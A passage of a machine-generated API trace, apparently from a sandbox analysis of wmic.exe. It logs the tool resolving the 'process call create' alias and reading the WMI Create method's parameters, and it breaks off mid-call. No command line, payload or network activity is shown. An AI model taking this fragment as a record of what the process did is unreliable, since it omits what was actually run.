pVal=0xcfb2c*(varType=0x2008, wReserved1=0x21, wReserved2=0x44cc, wReserved3=0x21, varVal1=0x236a78*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x2506e0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x8bc1e0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.582] SafeArrayGetLBound (in: psa=0x236a78, nDim=0x1, plLbound=0xcfb44 | out: plLbound=0xcfb44) returned 0x0 [0172.582] SafeArrayGetUBound (in: psa=0x236a78, nDim=0x1, plUbound=0xcfb40 | out: plUbound=0xcfb40) returned 0x0 [0172.582] SafeArrayGetElement (in: psa=0x236a78, rgIndices=0xcfba4, pv=0xcfb6c | out: pv=0xcfb6c) returned 0x0 [0172.582] SysStringLen (param_1="Process management. ") returned 0x14 [0172.583] IUnknown:Release (This=0x750440) returned 0x0 [0172.583] ??1CHString@@QAE@XZ () returned 0x1 [0172.583] ??1CHString@@QAE@XZ () returned 0x6f950504 [0172.583] ??1CHString@@QAE@XZ () returned 0x6f950504 [0172.583] lstrlenW (lpString="Process management. ") returned 20 [0172.583] lstrlenW (lpString="Process management. 
") returned 20 [0172.583] IUnknown:Release (This=0x74fff8) returned 0x0 [0172.583] ??1CHString@@QAE@XZ () returned 0x6f950504 [0172.583] lstrlenW (lpString="PATH") returned 4 [0172.583] lstrlenW (lpString="call") returned 4 [0172.583] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="PATH", cchCount2=4) returned 1 [0172.583] lstrlenW (lpString="WHERE") returned 5 [0172.583] lstrlenW (lpString="call") returned 4 [0172.583] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="WHERE", cchCount2=5) returned 1 [0172.583] lstrlenW (lpString="(") returned 1 [0172.583] lstrlenW (lpString="call") returned 4 [0172.583] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="(", cchCount2=1) returned 3 [0172.583] lstrlenW (lpString="/") returned 1 [0172.583] lstrlenW (lpString="call") returned 4 [0172.583] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0172.583] lstrlenW (lpString="-") returned 1 [0172.583] lstrlenW (lpString="call") returned 4 [0172.583] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0172.584] lstrlenW (lpString="GET") returned 3 [0172.584] lstrlenW (lpString="call") returned 4 [0172.584] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0172.584] lstrlenW (lpString="LIST") returned 4 [0172.584] lstrlenW (lpString="call") returned 4 [0172.584] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0172.584] lstrlenW (lpString="SET") returned 3 [0172.584] lstrlenW (lpString="call") returned 4 [0172.584] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0172.584] lstrlenW 
(lpString="CREATE") returned 6 [0172.584] lstrlenW (lpString="call") returned 4 [0172.584] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0172.584] lstrlenW (lpString="CALL") returned 4 [0172.584] lstrlenW (lpString="call") returned 4 [0172.584] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0172.584] lstrlenW (lpString="/") returned 1 [0172.584] lstrlenW (lpString="call") returned 4 [0172.584] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0172.584] lstrlenW (lpString="-") returned 1 [0172.584] lstrlenW (lpString="call") returned 4 [0172.584] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0172.584] lstrlenW (lpString="call") returned 4 [0172.584] lstrlenW (lpString="call") returned 4 [0172.584] lstrlenW (lpString="GET") returned 3 [0172.584] lstrlenW (lpString="call") returned 4 [0172.584] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0172.584] lstrlenW (lpString="LIST") returned 4 [0172.584] lstrlenW (lpString="call") returned 4 [0172.584] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0172.584] lstrlenW (lpString="SET") returned 3 [0172.584] lstrlenW (lpString="call") returned 4 [0172.584] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0172.585] lstrlenW (lpString="CREATE") returned 6 [0172.585] lstrlenW (lpString="call") returned 4 [0172.585] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0172.585] lstrlenW (lpString="CALL") returned 4 [0172.585] lstrlenW 
(lpString="call") returned 4 [0172.585] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0172.585] lstrlenW (lpString="/") returned 1 [0172.585] lstrlenW (lpString="create") returned 6 [0172.585] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="create", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0172.585] lstrlenW (lpString="-") returned 1 [0172.585] lstrlenW (lpString="create") returned 6 [0172.585] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="create", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0172.585] lstrlenW (lpString="create") returned 6 [0172.585] lstrlenW (lpString="create") returned 6 [0172.585] GetCurrentThreadId () returned 0xf7c [0172.585] ??0CHString@@QAE@XZ () returned 0xcf41c [0172.585] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0172.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x871f7c, cbMultiByte=-1, lpWideCharStr=0x472fa8, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0172.585] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0172.585] SysStringLen (param_1="process") returned 0x7 [0172.586] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='process") returned 0x23 [0172.586] SysStringLen (param_1="'") returned 0x1 [0172.586] IWbemServices:GetObject (in: This=0x72c74c, strObjectPath="MSFT_CliAlias.FriendlyName='process'", lFlags=0, pCtx=0x0, ppObject=0xcf3f4*=0x0, ppCallResult=0x0 | out: ppObject=0xcf3f4*=0x74fff8, ppCallResult=0x0) returned 0x0 [0172.598] lstrlenW (lpString="CALL") returned 4 [0172.598] lstrlenW (lpString="call") returned 4 [0172.598] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0172.598] IWbemClassObject:Get (in: This=0x74fff8, wszName="Verbs", lFlags=0, pVal=0xcf370*(varType=0x0, wReserved1=0xc, wReserved2=0xc760, 
wReserved3=0x72, varVal1=0x720150, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf370*(varType=0x200d, wReserved1=0xc, wReserved2=0xc760, wReserved3=0x72, varVal1=0x236a78*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0x20b650, rgsabound=((cElements=0x6, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.599] SafeArrayGetLBound (in: psa=0x236a78, nDim=0x1, plLbound=0xcf3bc | out: plLbound=0xcf3bc) returned 0x0 [0172.599] SafeArrayGetUBound (in: psa=0x236a78, nDim=0x1, plUbound=0xcf3a8 | out: plUbound=0xcf3a8) returned 0x0 [0172.599] SafeArrayGetElement (in: psa=0x236a78, rgIndices=0xcf3cc, pv=0xcf408 | out: pv=0xcf408) returned 0x0 [0172.599] IWbemClassObject:Get (in: This=0x752e50, wszName="Name", lFlags=0, pVal=0xcf360*(varType=0x0, wReserved1=0xc, wReserved2=0x190, wReserved3=0x75, varVal1=0x1, varVal2=0x72c758), pType=0x0, plFlavor=0x0 | out: pVal=0xcf360*(varType=0x8, wReserved1=0xc, wReserved2=0x190, wReserved3=0x75, varVal1="Create", varVal2=0x72c758), pType=0x0, plFlavor=0x0) returned 0x0 [0172.599] lstrlenW (lpString="Create") returned 6 [0172.599] lstrlenW (lpString="create") returned 6 [0172.599] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="create", cchCount1=6, lpString2="Create", cchCount2=6) returned 2 [0172.599] GetCurrentThreadId () returned 0xf7c [0172.600] ??0CHString@@QAE@XZ () returned 0xcf250 [0172.600] IWbemClassObject:Get (in: This=0x752e50, wszName="Description", lFlags=0, pVal=0xcf220*(varType=0x0, wReserved1=0x76a9, wReserved2=0x5e03, wReserved3=0x9303, varVal1=0x0, varVal2=0x47f0b0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf220*(varType=0x8, wReserved1=0x76a9, wReserved2=0x5e03, wReserved3=0x9303, varVal1="The Create method creates a new process. 
It returns an integer value of 0 if the process was successfully created, and any other number to indicate an error.", varVal2=0x47f0b0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.600] ??1CHString@@QAE@XZ () returned 0x6f950504 [0172.600] IWbemClassObject:Get (in: This=0x752e50, wszName="Parameters", lFlags=0, pVal=0xcf350*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x72, varVal1=0x720810, varVal2=0x72c760), pType=0x0, plFlavor=0x0 | out: pVal=0xcf350*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x72, varVal1=0x236aa8*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0x24ce30, rgsabound=((cElements=0x4, lLbound=0))), varVal2=0x72c760), pType=0x0, plFlavor=0x0) returned 0x0 [0172.600] IWbemClassObject:Get (in: This=0x752e50, wszName="VerbType", lFlags=0, pVal=0xcf328*(varType=0x0, wReserved1=0x100, wReserved2=0x0, wReserved3=0x0, varVal1=0x720000, varVal2=0x8), pType=0x0, plFlavor=0x0 | out: pVal=0xcf328*(varType=0x3, wReserved1=0x100, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x8), pType=0x0, plFlavor=0x0) returned 0x0 [0172.600] IWbemClassObject:Get (in: This=0x752e50, wszName="Derivation", lFlags=0, pVal=0xcf308*(varType=0x0, wReserved1=0x72, wReserved2=0x0, wReserved3=0x72, varVal1=0x720808, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf308*(varType=0x8, wReserved1=0x72, wReserved2=0x0, wReserved3=0x72, varVal1="Create", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.600] lstrlenW (lpString="Create") returned 6 [0172.600] lstrlenW (lpString="Create") returned 6 [0172.600] SafeArrayGetLBound (in: psa=0x236aa8, nDim=0x1, plLbound=0xcf384 | out: plLbound=0xcf384) returned 0x0 [0172.600] SafeArrayGetUBound (in: psa=0x236aa8, nDim=0x1, plUbound=0xcf3a0 | out: plUbound=0xcf3a0) returned 0x0 [0172.600] SafeArrayGetElement (in: psa=0x236aa8, rgIndices=0xcf3e0, pv=0xcf3f0 | out: pv=0xcf3f0) returned 0x0 [0172.600] IWbemClassObject:Get (in: This=0x75bbf8, wszName="ParaId", lFlags=0, 
pVal=0xcf318*(varType=0x0, wReserved1=0x301, wReserved2=0x9b08, wReserved3=0x6ec2, varVal1=0x5, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf318*(varType=0x8, wReserved1=0x301, wReserved2=0x9b08, wReserved3=0x6ec2, varVal1="CommandLine", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.601] IWbemClassObject:Get (in: This=0x75bbf8, wszName="Type", lFlags=0, pVal=0xcf2f8*(varType=0x0, wReserved1=0x6ec2, wReserved2=0x4, wReserved3=0x0, varVal1=0x720174, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf2f8*(varType=0x8, wReserved1=0x6ec2, wReserved2=0x4, wReserved3=0x0, varVal1="STRING", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.601] IWbemClassObject:Get (in: This=0x75bbf8, wszName="Default", lFlags=0, pVal=0xcf338*(varType=0x0, wReserved1=0x72, wReserved2=0xf42c, wReserved3=0xc, varVal1=0x77286594, varVal2=0x720138), pType=0x0, plFlavor=0x0 | out: pVal=0xcf338*(varType=0x1, wReserved1=0x72, wReserved2=0xf42c, wReserved3=0xc, varVal1=0x77286594, varVal2=0x720138), pType=0x0, plFlavor=0x0) returned 0x0 [0172.601] GetCurrentThreadId () returned 0xf7c [0172.601] ??0CHString@@QAE@XZ () returned 0xcf258 [0172.601] IWbemClassObject:Get (in: This=0x75bbf8, wszName="Qualifiers", lFlags=0, pVal=0xcf1dc*(varType=0x0, wReserved1=0x87, wReserved2=0x24, wReserved3=0x0, varVal1=0x75b76e, varVal2=0xcf23c), pType=0x0, plFlavor=0x0 | out: pVal=0xcf1dc*(varType=0x200d, wReserved1=0x87, wReserved2=0x24, wReserved3=0x0, varVal1=0x236ad8*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0x2506e0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0xcf23c), pType=0x0, plFlavor=0x0) returned 0x0 [0172.601] SafeArrayGetLBound (in: psa=0x236ad8, nDim=0x1, plLbound=0xcf218 | out: plLbound=0xcf218) returned 0x0 [0172.601] SafeArrayGetUBound (in: psa=0x236ad8, nDim=0x1, plUbound=0xcf204 | out: plUbound=0xcf204) returned 0x0 [0172.601] SafeArrayGetElement (in: psa=0x236ad8, rgIndices=0xcf240, pv=0xcf250 | out: pv=0xcf250) returned 0x0 [0172.601] 
IWbemClassObject:Get (in: This=0x75d520, wszName="Name", lFlags=0, pVal=0xcf1ec*(varType=0x0, wReserved1=0x47, wReserved2=0xf224, wReserved3=0xc, varVal1=0x877e52, varVal2=0x1), pType=0x0, plFlavor=0x0 | out: pVal=0xcf1ec*(varType=0x8, wReserved1=0x47, wReserved2=0xf224, wReserved3=0xc, varVal1="In", varVal2=0x1), pType=0x0, plFlavor=0x0) returned 0x0 [0172.602] IWbemClassObject:Get (in: This=0x75d520, wszName="QualifierValue", lFlags=0, pVal=0xcf1cc*(varType=0x0, wReserved1=0x47, wReserved2=0x0, wReserved3=0x0, varVal1=0x75b76e, varVal2=0xcf1f0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf1cc*(varType=0x2008, wReserved1=0x47, wReserved2=0x0, wReserved3=0x0, varVal1=0x236b08*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x250810, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0xcf1f0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.602] SafeArrayGetLBound (in: psa=0x236b08, nDim=0x1, plLbound=0xcf220 | out: plLbound=0xcf220) returned 0x0 [0172.602] SafeArrayGetUBound (in: psa=0x236b08, nDim=0x1, plUbound=0xcf210 | out: plUbound=0xcf210) returned 0x0 [0172.602] lstrlenW (lpString="CIMTYPE") returned 7 [0172.602] lstrlenW (lpString="In") returned 2 [0172.602] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="CIMTYPE", cchCount2=7) returned 3 [0172.602] lstrlenW (lpString="read") returned 4 [0172.602] lstrlenW (lpString="In") returned 2 [0172.602] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="read", cchCount2=4) returned 1 [0172.602] lstrlenW (lpString="write") returned 5 [0172.602] lstrlenW (lpString="In") returned 2 [0172.602] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="write", cchCount2=5) returned 1 [0172.602] lstrlenW (lpString="In") returned 2 [0172.602] lstrlenW (lpString="In") returned 2 [0172.602] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="In", cchCount2=2) returned 2 
[0172.602] SafeArrayGetElement (in: psa=0x236b08, rgIndices=0xcf244, pv=0xcf278 | out: pv=0xcf278) returned 0x0 [0172.602] lstrlenW (lpString="true") returned 4 [0172.602] lstrlenW (lpString="True") returned 4 [0172.602] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="True", cchCount1=4, lpString2="true", cchCount2=4) returned 2 [0172.603] IUnknown:Release (This=0x75d520) returned 0x1 [0172.603] ??1CHString@@QAE@XZ () returned 0x6f950504 [0172.604] IUnknown:Release (This=0x75bbf8) returned 0x1 [0172.604] SafeArrayGetElement (in: psa=0x236aa8, rgIndices=0xcf3e0, pv=0xcf3f0 | out: pv=0xcf3f0) returned 0x0 [0172.604] IWbemClassObject:Get (in: This=0x75c4f0, wszName="ParaId", lFlags=0, pVal=0xcf318*(varType=0x0, wReserved1=0x301, wReserved2=0x9b08, wReserved3=0x6ec2, varVal1=0x25d22c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf318*(varType=0x8, wReserved1=0x301, wReserved2=0x9b08, wReserved3=0x6ec2, varVal1="CurrentDirectory", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.604] IWbemClassObject:Get (in: This=0x75c4f0, wszName="Type", lFlags=0, pVal=0xcf2f8*(varType=0x0, wReserved1=0x6ec2, wReserved2=0x4, wReserved3=0x0, varVal1=0x24821c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf2f8*(varType=0x8, wReserved1=0x6ec2, wReserved2=0x4, wReserved3=0x0, varVal1="STRING", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.604] IWbemClassObject:Get (in: This=0x75c4f0, wszName="Default", lFlags=0, pVal=0xcf338*(varType=0x0, wReserved1=0x72, wReserved2=0xf42c, wReserved3=0xc, varVal1=0x77286594, varVal2=0x720138), pType=0x0, plFlavor=0x0 | out: pVal=0xcf338*(varType=0x1, wReserved1=0x72, wReserved2=0xf42c, wReserved3=0xc, varVal1=0x77286594, varVal2=0x720138), pType=0x0, plFlavor=0x0) returned 0x0 [0172.605] GetCurrentThreadId () returned 0xf7c [0172.605] ??0CHString@@QAE@XZ () returned 0xcf258 [0172.605] IWbemClassObject:Get (in: This=0x75c4f0, wszName="Qualifiers", lFlags=0, pVal=0xcf1dc*(varType=0x0, wReserved1=0x87, 
wReserved2=0x24, wReserved3=0x0, varVal1=0x75be0e, varVal2=0xcf23c), pType=0x0, plFlavor=0x0 | out: pVal=0xcf1dc*(varType=0x200d, wReserved1=0x87, wReserved2=0x24, wReserved3=0x0, varVal1=0x236ad8*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0x2506e0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0xcf23c), pType=0x0, plFlavor=0x0) returned 0x0 [0172.605] SafeArrayGetLBound (in: psa=0x236ad8, nDim=0x1, plLbound=0xcf218 | out: plLbound=0xcf218) returned 0x0 [0172.605] SafeArrayGetUBound (in: psa=0x236ad8, nDim=0x1, plUbound=0xcf204 | out: plUbound=0xcf204) returned 0x0 [0172.605] SafeArrayGetElement (in: psa=0x236ad8, rgIndices=0xcf240, pv=0xcf250 | out: pv=0xcf250) returned 0x0 [0172.605] IWbemClassObject:Get (in: This=0x75d520, wszName="Name", lFlags=0, pVal=0xcf1ec*(varType=0x0, wReserved1=0x47, wReserved2=0xf224, wReserved3=0xc, varVal1=0x877e52, varVal2=0x1), pType=0x0, plFlavor=0x0 | out: pVal=0xcf1ec*(varType=0x8, wReserved1=0x47, wReserved2=0xf224, wReserved3=0xc, varVal1="In", varVal2=0x1), pType=0x0, plFlavor=0x0) returned 0x0 [0172.605] IWbemClassObject:Get (in: This=0x75d520, wszName="QualifierValue", lFlags=0, pVal=0xcf1cc*(varType=0x0, wReserved1=0x47, wReserved2=0x0, wReserved3=0x0, varVal1=0x75be0e, varVal2=0xcf1f0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf1cc*(varType=0x2008, wReserved1=0x47, wReserved2=0x0, wReserved3=0x0, varVal1=0x236b08*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x250810, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0xcf1f0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.605] SafeArrayGetLBound (in: psa=0x236b08, nDim=0x1, plLbound=0xcf220 | out: plLbound=0xcf220) returned 0x0 [0172.605] SafeArrayGetUBound (in: psa=0x236b08, nDim=0x1, plUbound=0xcf210 | out: plUbound=0xcf210) returned 0x0 [0172.605] lstrlenW (lpString="CIMTYPE") returned 7 [0172.605] lstrlenW (lpString="In") returned 2 [0172.605] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, 
lpString2="CIMTYPE", cchCount2=7) returned 3 [0172.605] lstrlenW (lpString="read") returned 4 [0172.605] lstrlenW (lpString="In") returned 2 [0172.606] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="read", cchCount2=4) returned 1 [0172.606] lstrlenW (lpString="write") returned 5 [0172.606] lstrlenW (lpString="In") returned 2 [0172.606] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="write", cchCount2=5) returned 1 [0172.606] lstrlenW (lpString="In") returned 2 [0172.606] lstrlenW (lpString="In") returned 2 [0172.606] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="In", cchCount2=2) returned 2 [0172.606] SafeArrayGetElement (in: psa=0x236b08, rgIndices=0xcf244, pv=0xcf278 | out: pv=0xcf278) returned 0x0 [0172.606] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="True", cchCount1=4, lpString2="true", cchCount2=4) returned 2 [0172.606] IUnknown:Release (This=0x75d520) returned 0x1 [0172.606] ??1CHString@@QAE@XZ () returned 0x6f950504 [0172.606] SysStringLen (param_1="CurrentDirectory") returned 0x10 [0172.606] SysStringLen (param_1="CommandLine") returned 0xb [0172.606] SysStringLen (param_1="CommandLine") returned 0xb [0172.606] SysStringLen (param_1="CurrentDirectory") returned 0x10 [0172.606] IUnknown:Release (This=0x75c4f0) returned 0x1 [0172.606] SafeArrayGetElement (in: psa=0x236aa8, rgIndices=0xcf3e0, pv=0xcf3f0 | out: pv=0xcf3f0) returned 0x0 [0172.606] IWbemClassObject:Get (in: This=0x75cbc0, wszName="ParaId", lFlags=0, pVal=0xcf318*(varType=0x0, wReserved1=0x301, wReserved2=0x9b08, wReserved3=0x6ec2, varVal1=0x204eac, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf318*(varType=0x8, wReserved1=0x301, wReserved2=0x9b08, wReserved3=0x6ec2, varVal1="ProcessStartupInformation", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.607] IWbemClassObject:Get (in: This=0x75cbc0, wszName="Type", lFlags=0, 
pVal=0xcf2f8*(varType=0x0, wReserved1=0x6ec2, wReserved2=0x4, wReserved3=0x0, varVal1=0x24821c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf2f8*(varType=0x8, wReserved1=0x6ec2, wReserved2=0x4, wReserved3=0x0, varVal1="OBJECT", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.607] IWbemClassObject:Get (in: This=0x75cbc0, wszName="Default", lFlags=0, pVal=0xcf338*(varType=0x0, wReserved1=0x72, wReserved2=0xf42c, wReserved3=0xc, varVal1=0x77286594, varVal2=0x720138), pType=0x0, plFlavor=0x0 | out: pVal=0xcf338*(varType=0x1, wReserved1=0x72, wReserved2=0xf42c, wReserved3=0xc, varVal1=0x77286594, varVal2=0x720138), pType=0x0, plFlavor=0x0) returned 0x0 [0172.607] ??0CHString@@QAE@XZ () returned 0xcf258 [0172.607] IWbemClassObject:Get (in: This=0x75cbc0, wszName="Qualifiers", lFlags=0, pVal=0xcf1dc*(varType=0x0, wReserved1=0x87, wReserved2=0x24, wReserved3=0x0, varVal1=0x75c706, varVal2=0xcf23c), pType=0x0, plFlavor=0x0 | out: pVal=0xcf1dc*(varType=0x200d, wReserved1=0x87, wReserved2=0x24, wReserved3=0x0, varVal1=0x236ad8*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0x2506e0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0xcf23c), pType=0x0, plFlavor=0x0) returned 0x0 [0172.607] SafeArrayGetLBound (in: psa=0x236ad8, nDim=0x1, plLbound=0xcf218 | out: plLbound=0xcf218) returned 0x0 [0172.607] SafeArrayGetUBound (in: psa=0x236ad8, nDim=0x1, plUbound=0xcf204 | out: plUbound=0xcf204) returned 0x0 [0172.607] SafeArrayGetElement (in: psa=0x236ad8, rgIndices=0xcf240, pv=0xcf250 | out: pv=0xcf250) returned 0x0 [0172.607] IWbemClassObject:Get (in: This=0x75d520, wszName="Name", lFlags=0, pVal=0xcf1ec*(varType=0x0, wReserved1=0x47, wReserved2=0xf224, wReserved3=0xc, varVal1=0x877e52, varVal2=0x1), pType=0x0, plFlavor=0x0 | out: pVal=0xcf1ec*(varType=0x8, wReserved1=0x47, wReserved2=0xf224, wReserved3=0xc, varVal1="In", varVal2=0x1), pType=0x0, plFlavor=0x0) returned 0x0 [0172.607] IWbemClassObject:Get (in: This=0x75d520, 
wszName="QualifierValue", lFlags=0, pVal=0xcf1cc*(varType=0x0, wReserved1=0x47, wReserved2=0x0, wReserved3=0x0, varVal1=0x75c706, varVal2=0xcf1f0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf1cc*(varType=0x2008, wReserved1=0x47, wReserved2=0x0, wReserved3=0x0, varVal1=0x236b08*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x250810, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0xcf1f0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.735] SafeArrayGetLBound (in: psa=0x236b08, nDim=0x1, plLbound=0xcf220 | out: plLbound=0xcf220) returned 0x0 [0172.735] SafeArrayGetUBound (in: psa=0x236b08, nDim=0x1, plUbound=0xcf210 | out: plUbound=0xcf210) returned 0x0 [0172.735] lstrlenW (lpString="CIMTYPE") returned 7 [0172.735] lstrlenW (lpString="In") returned 2 [0172.735] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="CIMTYPE", cchCount2=7) returned 3 [0172.735] lstrlenW (lpString="read") returned 4 [0172.735] lstrlenW (lpString="In") returned 2 [0172.735] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="read", cchCount2=4) returned 1 [0172.736] lstrlenW (lpString="write") returned 5 [0172.736] lstrlenW (lpString="In") returned 2 [0172.736] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="write", cchCount2=5) returned 1 [0172.736] lstrlenW (lpString="In") returned 2 [0172.736] lstrlenW (lpString="In") returned 2 [0172.736] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="In", cchCount2=2) returned 2 [0172.736] SafeArrayGetElement (in: psa=0x236b08, rgIndices=0xcf244, pv=0xcf278 | out: pv=0xcf278) returned 0x0 [0172.736] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="True", cchCount1=4, lpString2="true", cchCount2=4) returned 2 [0172.736] IUnknown:Release (This=0x75d520) returned 0x1 [0172.736] ??1CHString@@QAE@XZ () returned 0x6f950504 [0172.736] SysStringLen 
(param_1="ProcessStartupInformation") returned 0x19 [0172.736] SysStringLen (param_1="CommandLine") returned 0xb [0172.736] SysStringLen (param_1="ProcessStartupInformation") returned 0x19 [0172.736] SysStringLen (param_1="CurrentDirectory") returned 0x10 [0172.736] SysStringLen (param_1="CurrentDirectory") returned 0x10 [0172.736] SysStringLen (param_1="ProcessStartupInformation") returned 0x19 [0172.736] IUnknown:Release (This=0x75cbc0) returned 0x1 [0172.736] SafeArrayGetElement (in: psa=0x236aa8, rgIndices=0xcf3e0, pv=0xcf3f0 | out: pv=0xcf3f0) returned 0x0 [0172.736] IWbemClassObject:Get (in: This=0x75d268, wszName="ParaId", lFlags=0, pVal=0xcf318*(varType=0x0, wReserved1=0x301, wReserved2=0x9b08, wReserved3=0x6ec2, varVal1=0x24b0a4, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf318*(varType=0x8, wReserved1=0x301, wReserved2=0x9b08, wReserved3=0x6ec2, varVal1="ProcessId", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.737] IWbemClassObject:Get (in: This=0x75d268, wszName="Type", lFlags=0, pVal=0xcf2f8*(varType=0x0, wReserved1=0x6ec2, wReserved2=0x4, wReserved3=0x0, varVal1=0x24d57c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf2f8*(varType=0x8, wReserved1=0x6ec2, wReserved2=0x4, wReserved3=0x0, varVal1="UINT32", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.737] IWbemClassObject:Get (in: This=0x75d268, wszName="Default", lFlags=0, 